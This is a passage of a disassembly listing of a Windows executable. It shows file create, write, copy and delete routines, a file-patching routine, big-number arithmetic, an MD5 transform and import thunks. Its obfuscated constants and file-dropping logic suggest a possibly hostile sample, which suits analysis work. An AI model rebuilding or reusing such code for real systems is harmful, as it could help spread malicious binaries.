movsx ecx, word_44A218
add edx, ecx
sub edx, 9
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, dword_44A0D4
sub eax, 6
push eax
push 2
push 0
movsx eax, word_44A1E0
movsx edx, word_44A1C0
add eax, edx
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call ds:dword_449788 ; CreateFileA
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31EDC]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_449B8C ; WriteFile
push [ebp+var_1070]
call ds:dword_448654 ; CloseHandle
push [ebp+var_4]
call ds:dword_44661C ; LocalFree
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_447364 ; CopyFileA
lea eax, [ebp+var_116F]
push eax
call ds:dword_444008 ; DeleteFileA
mov eax, 1
jmp short loc_442439
; ---------------------------------------------------------------------------
loc_442422: ; CODE XREF: sub_440F46+C3�j
; sub_440F46+DD�j ...
push [ebp+var_1070]
call ds:dword_448654 ; CloseHandle
push [ebp+var_4]
call ds:dword_44661C ; LocalFree
xor eax, eax
loc_442439: ; CODE XREF: sub_440F46+5F�j
; sub_440F46+14DA�j
pop edi
pop esi
pop ebx
leave
retn
sub_440F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44243E proc near ; CODE XREF: sub_43CE89+A8�p
; sub_43CE89+16B�p
var_1000C = dword ptr -1000Ch
var_10003 = byte ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_442F6C
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, dword_447260
cmp [ebp+arg_4], 43h
jnz short loc_442463
lea edi, dword_4460F0
loc_442463: ; CODE XREF: sub_44243E+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call ds:dword_449788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_44251D
push 0
push 0
push esi
push edi
call ds:dword_449B9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_444028 ; ReadFile
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_4424B5: ; CODE XREF: sub_44243E+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4424B5
mov edx, dword_44A238
add edx, 1
movsx ecx, word_44A1C0
add edx, ecx
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, dword_44A0C8
add ebx, dword_44A258
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_1000C+1], edx
push 0
push 0
push esi
push edi
call ds:dword_449B9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
movsx eax, word_44A264
sub eax, 5
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_449B8C ; WriteFile
push edi
call ds:dword_448654 ; CloseHandle
loc_44251D: ; CODE XREF: sub_44243E+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_44243E endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442524 proc near ; CODE XREF: sub_439DC4+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_44BB28
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4425EF
xor edx, edx
loc_442554: ; CODE XREF: sub_442524+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_442566
mov edx, [ebp+arg_4]
call sub_442580
loc_442566: ; CODE XREF: sub_442524+38�j
lea edx, dword_44BB28
call sub_442580
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_442554
popa
pop ebp
retn 10h
sub_442524 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_442580 proc near ; CODE XREF: sub_442524+3D�p
; sub_442524+48�p
lea edi, dword_44BAE8
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_44BB28
call sub_4425EF
loc_44259A: ; CODE XREF: sub_442580+5D�j
lea edi, dword_44BAE8
mov ecx, 10h
xor eax, eax
loc_4425A7: ; CODE XREF: sub_442580+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_4425A7
call sub_442600
bt dword_44BB28, ebx
jnb short loc_4425DC
mov esi, edx
lea edi, dword_44BAE8
xor eax, eax
mov ecx, 10h
loc_4425CB: ; CODE XREF: sub_442580+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4425CB
call sub_442600
loc_4425DC: ; CODE XREF: sub_442580+3A�j
dec ebx
jns short loc_44259A
mov edi, edx
lea esi, dword_44BAE8
mov ecx, 10h
rep movsd
retn
sub_442580 endp
; =============== S U B R O U T I N E =======================================
sub_4425EF proc near ; CODE XREF: sub_442524+29�p
; sub_442580+15�p
mov ebx, 1FFh
loc_4425F4: ; CODE XREF: sub_4425EF+B�j
bt [edi], ebx
jb short locret_4425FC
dec ebx
jnz short loc_4425F4
locret_4425FC: ; CODE XREF: sub_4425EF+8�j
retn
sub_4425EF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_442600 proc near ; CODE XREF: sub_442580+2E�p
; sub_442580+57�p
lea esi, dword_44BAE8
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_44260E: ; CODE XREF: sub_442600+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_442637
ja short loc_44261B
dec ecx
jns short loc_44260E
loc_44261B: ; CODE XREF: sub_442600+16�j
mov esi, [ebp+14h]
lea edi, dword_44BAE8
xor eax, eax
mov ecx, 10h
loc_44262B: ; CODE XREF: sub_442600+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_44262B
locret_442637: ; CODE XREF: sub_442600+14�j
retn
sub_442600 endp
; =============== S U B R O U T I N E =======================================
sub_442638 proc near ; CODE XREF: sub_442689+32�p
; sub_442689+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_442638 endp
; =============== S U B R O U T I N E =======================================
sub_442645 proc near ; CODE XREF: sub_442689+219�p
; sub_442689+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_442645 endp
; =============== S U B R O U T I N E =======================================
sub_442652 proc near ; CODE XREF: sub_442689+420�p
; sub_442689+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_442652 endp
; =============== S U B R O U T I N E =======================================
sub_442659 proc near ; CODE XREF: sub_442689+627�p
; sub_442689+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_442659 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442662 proc near ; CODE XREF: sub_43C2C0+73�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_442662 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_442689 proc near ; CODE XREF: sub_43C2C0+8B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_44BB68, eax
mov eax, [edi+4]
mov dword_44BB6C, eax
mov eax, [edi+8]
mov dword_44BB70, eax
mov eax, [edi+0Ch]
mov dword_44BB74, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442638
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442638
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442638
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442638
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442638
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442638
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442638
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442638
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442638
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442638
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442638
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442638
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442638
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442638
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442638
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442645
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442645
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442645
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442645
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442645
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442645
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442645
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442645
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442645
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442645
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442645
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442645
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442645
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442645
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442645
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442645
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442652
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442652
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442652
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442652
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442652
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442652
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442652
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442652
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442652
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442652
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442652
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442652
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442652
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442652
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442652
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442652
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442659
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442659
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442659
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442659
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442659
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442659
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442659
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442659
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442659
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442659
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442659
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442659
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_442659
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_442659
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_442659
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_442659
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_44BB68
add [edi], eax
mov eax, dword_44BB6C
add [edi+4], eax
mov eax, dword_44BB70
add [edi+8], eax
mov eax, dword_44BB74
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_442689 endp
; =============== S U B R O U T I N E =======================================
sub_442ED4 proc near ; CODE XREF: sub_442EF1+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_442ED5: ; CODE XREF: sub_442ED4+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_442ED5
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_442ED4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_442EF1 proc near ; CODE XREF: sub_43D058+42�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_442F21
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_442ED4
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_442F21: ; CODE XREF: sub_442EF1+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_442EF1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_442F30 proc near ; CODE XREF: .text:004381BA�p
; DATA XREF: .data:off_44A000�o
xor eax, eax
inc eax
retn 0Ch
sub_442F30 endp
; ---------------------------------------------------------------------------
align 4
push eax
fnstcw word ptr [esp]
mov eax, [esp]
btr dword ptr [esp], 8
or word ptr [esp], 200h
; START OF FUNCTION CHUNK FOR sub_442F5B
loc_442F4A: ; CODE XREF: sub_442F5B+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_442F4E: ; CODE XREF: .text:00442F59�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_442F5B
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_442F4E
; =============== S U B R O U T I N E =======================================
sub_442F5B proc near ; CODE XREF: .text:loc_4381A7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00442F4A SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_442F4A
sub_442F5B endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_442F6C proc near ; CODE XREF: sub_43858C+8�p
; sub_4393B1+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_442F6D: ; CODE XREF: sub_442F6C+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_442F6D
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_442F6C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_442F8C proc near ; CODE XREF: sub_43858C+243�p
; sub_43858C+5A7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_442F8C endp
; ---------------------------------------------------------------------------
align 4
jmp ds:dword_44C0AC
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_442FC4 proc near ; CODE XREF: sub_43825C+10�p
jmp ds:dword_44C0B0
sub_442FC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_442FD0 proc near ; CODE XREF: sub_438080+13�p
jmp ds:dword_44C0B4
sub_442FD0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_442FDC proc near ; CODE XREF: sub_4381C3+33�p
; sub_4381C3+45�p ...
jmp ds:dword_44C0C0
sub_442FDC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_442FE8 proc near ; CODE XREF: sub_4381C3+B�p
; sub_4381C3+17�p ...
jmp ds:dword_44C0C4
sub_442FE8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; ---------------------------------------------------------------------------
jmp ds:dword_44C0C8
; ---------------------------------------------------------------------------
align 10h
jmp ds:dword_44C0CC
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44300C proc near ; CODE XREF: sub_43825C+4E�p
; sub_43825C+87�p
jmp ds:dword_44C0D0
sub_44300C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_443018 proc near ; CODE XREF: .text:00438186�p
jmp ds:dword_44C0D4
sub_443018 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_443024 proc near ; CODE XREF: sub_4381C3+71�p
; sub_4381C3+86�p
jmp ds:dword_44C0D8
sub_443024 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_443030 proc near ; CODE XREF: sub_43825C+9E�p
jmp ds:dword_44C0DC
sub_443030 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
_text ends
; Section 5. (virtual address 00044000)
; Virtual size : 00005BD8 ( 23512.)
; Section size in file : 00005BD8 ( 23512.)
; Offset to raw data for section: 00044000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_bss segment para public 'BSS' use32
assume cs:_bss
;org 444000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_444000 dd 77E77EF1h ; DATA XREF: sub_43A105+130�w
; sub_43C434+D�r
dword_444004 dd 77D46254h ; DATA XREF: sub_439DDE+12A�w
; sub_43F6E3+15�r ...
dword_444008 dd 77E73628h ; DATA XREF: sub_43A105+A4�w
; sub_43AF47+47A�r ...
dword_44400C dd 77E79924h ; DATA XREF: sub_43A105+168�w
; sub_43C434+3A�r
dword_444010 dd 77E778C5h ; DATA XREF: sub_43A105+424�w
; sub_43CE60+1A�r ...
dword_444014 dd 77D4702Fh ; DATA XREF: sub_4393B1+5A�r
; sub_4393B1+121�r ...
dword_444018 dd 0 ; DATA XREF: sub_439B7B+F3�w
; sub_44006A+177�r
dword_44401C dd 76C693F0h ; DATA XREF: sub_43969E+51�w
; sub_44029C+1B7�r
dword_444020 dd 73D9E65Ch ; DATA XREF: sub_43858C+2A5�r
; sub_43858C+3B2�r ...
dword_444024 dd 0 ; DATA XREF: sub_43BA75+1EF�r
; sub_43C073+F4�w
dword_444028 dd 77E78B82h ; DATA XREF: sub_43A105+1D8�w
; sub_43AF47+7D�r ...
